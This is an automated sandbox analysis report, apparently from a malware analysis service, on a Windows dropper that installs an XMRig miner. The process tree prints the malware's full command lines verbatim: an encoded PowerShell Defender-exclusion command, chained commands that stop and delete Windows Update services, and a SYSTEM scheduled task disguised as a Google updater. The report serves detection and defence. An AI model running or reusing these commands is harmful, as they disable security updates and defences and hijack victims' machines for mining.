Analysis

  • max time kernel
    300s
  • max time network
    259s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    26-06-2022 22:17

General

  • Target

    1b29fa6397bb1be0f94bc296471f7e0dec7df372fae367bde4837289a9ddf9ed.exe

  • Size

    7.4MB

  • MD5

    a631243304a5bf10c26f919e50a99bae

  • SHA1

    715cdcd8fe0344cc55ab5a30734f217f93312f3d

  • SHA256

    1b29fa6397bb1be0f94bc296471f7e0dec7df372fae367bde4837289a9ddf9ed

  • SHA512

    7459fbdf5aa2effde35f5b8399ab3ab56df7f48fa54b65c1565bbd17720da5b46ca1c9f8a27ad61f0021699048831eeb2b3f7c0afccd715a2ea537f520343651

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1b29fa6397bb1be0f94bc296471f7e0dec7df372fae367bde4837289a9ddf9ed.exe
    "C:\Users\Admin\AppData\Local\Temp\1b29fa6397bb1be0f94bc296471f7e0dec7df372fae367bde4837289a9ddf9ed.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2308
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:4648
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3940
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGEAdABpAG8AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB3AGkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBzAGQAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGQAIwA+AA=="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGEAdABpAG8AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB3AGkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBzAGQAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGQAIwA+AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4328
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:3584
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:4984
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:5040
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:864
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:5024
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:2148
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:2608
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:2072
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:2852
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:2944
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:3684
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4396
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1920
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:2328
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4668
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4656
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:4852
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:4884
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:4932
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:4356
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:4616
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:4280
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:2588
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4580
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4760
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3680
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4968
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1020
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:3828
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:2116
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:4312
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:4260
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:1400
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Checks computer location settings
                          PID:2212
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:3232
                      • C:\Windows\system32\browser_broker.exe
                        C:\Windows\system32\browser_broker.exe -Embedding
                        1⤵
                        • Modifies Internet Explorer settings
                        PID:3392
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2428
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5056
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4264
                      • C:\Program Files\Chrome\updater.exe
                        "C:\Program Files\Chrome\updater.exe"
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4376
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4540
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGEAdABpAG8AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB3AGkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBzAGQAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGQAIwA+AA=="
                            3⤵
                              PID:2584
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -EncodedCommand "PAAjAGEAdABpAG8AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB3AGkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBzAGQAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGQAIwA+AA=="
                                4⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2556
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              3⤵
                                PID:4340
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:2328
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:4412
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  4⤵
                                  • Launches sc.exe
                                  PID:4932
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  4⤵
                                  • Launches sc.exe
                                  PID:4328
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:4940
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4764
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3316
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  4⤵
                                  • Modifies registry key
                                  PID:2580
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3536
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:1536
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:2056
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:3760
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:1388
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3172
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4172
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:520
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  4⤵
                                    PID:5088
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    4⤵
                                      PID:1132
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      4⤵
                                        PID:1288
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        4⤵
                                          PID:4892
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          4⤵
                                            PID:4848
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            4⤵
                                              PID:3668
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              4⤵
                                                PID:2160
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              3⤵
                                                PID:2508
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4668
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4852
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4640
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4884
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe
                                                3⤵
                                                  PID:4664
                                                  • C:\Windows\System32\conhost.exe
                                                    "C:\Windows\System32\conhost.exe" "oupriynqbjt"
                                                    4⤵
                                                      PID:2856
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe xdaulfeotilqbjs1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4748
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:5044
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:4836

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              3
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              4
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.2MB

                                                MD5

                                                0b73b8642974b78eabef49340a4dbf45

                                                SHA1

                                                461472cf0e9e83b820f6cf878bd5e60405312756

                                                SHA256

                                                8e78264920b7a4891dad9c128845267b5f9a99ffed99d97518899a7ed1072084

                                                SHA512

                                                1b8d6b68e2e0bf49dcd187e3e7845858cedd3c19679085be903c6b60291acd1aa491aff3aa9130247d3bb5cd403949e9c9731068f2ebd50bafd6bfc9f1cf534b

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.2MB

                                                MD5

                                                0b73b8642974b78eabef49340a4dbf45

                                                SHA1

                                                461472cf0e9e83b820f6cf878bd5e60405312756

                                                SHA256

                                                8e78264920b7a4891dad9c128845267b5f9a99ffed99d97518899a7ed1072084

                                                SHA512

                                                1b8d6b68e2e0bf49dcd187e3e7845858cedd3c19679085be903c6b60291acd1aa491aff3aa9130247d3bb5cd403949e9c9731068f2ebd50bafd6bfc9f1cf534b

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

